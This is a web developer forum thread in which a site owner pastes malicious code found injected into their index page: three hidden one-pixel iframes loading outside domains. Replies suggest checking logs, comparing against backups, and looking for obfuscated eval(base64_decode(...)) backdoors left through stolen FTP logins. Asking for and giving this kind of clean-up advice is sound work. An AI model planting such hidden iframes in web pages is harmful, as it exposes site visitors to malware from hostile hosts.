Jump to content

Recommended Posts

Just got an email from google saying that my site has malware on it. I looked into this and found that someone has put coding in my index code here is the code:

 

<iframe src="http://bali-planet.com/" width="1" height="1" frameborder="0"></iframe><iframe src="http://adsensestat.com/" width="1" height="1" frameborder="0"></iframe><iframe src='http://visions7.net/' width=1 height=1 style='visibility:hidden;'></iframe>

 

I am a newbie at web development and would appreciate if someone could tell me how this happened and how to avoid it happening in the future.

 

I use a freehostia paid hosting account, so not sure if there is something happening on thier sever :S. 

 

Thank for reading.

 

Link to comment
https://forums.phpfreaks.com/topic/225687-injected-code/
Share on other sites

If the change was actually made to the source code in the file, then someone had sufficient access to the server to be able to read, change, and write the file.

 

You should get and check the server log files to find out all the information you can about who, what, when, and from where your file got written to.

 

You should also download a copy of all your files, taking card to NOT overwrite any existing backup copy of your files, and then use comparison tool, like WinMerge - http://winmerge.org/ to find all the differences between your last backup copy and the current files, including any new files that are not part of your web page.

Link to comment
https://forums.phpfreaks.com/topic/225687-injected-code/#findComment-1165303
Share on other sites

Happened to us - our designer got a virus that stole his FTP login. Whats weird is that it didn't show up right away. I think they steal the ftp passwords, the attack later on.

 

Look through your files. You probably have something like thumbnail.php that's just an eval(base64_decode("gf46uy45h6n67n6rmrnw45h... or something similar.

 

 

Link to comment
https://forums.phpfreaks.com/topic/225687-injected-code/#findComment-1165335
Share on other sites

Happened to us - our designer got a virus that stole his FTP login. Whats weird is that it didn't show up right away. I think they steal the ftp passwords, the attack later on.

 

Not so weird.  Think about it - there's more than one of these viruses in the wild, right?  Depending on how they do their job (simple keylogger?  something more sophisticated?), they're all going to be sending back a not insignificant amount of data.  Sifting through and testing the accumulated data takes time.

Link to comment
https://forums.phpfreaks.com/topic/225687-injected-code/#findComment-1165409
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.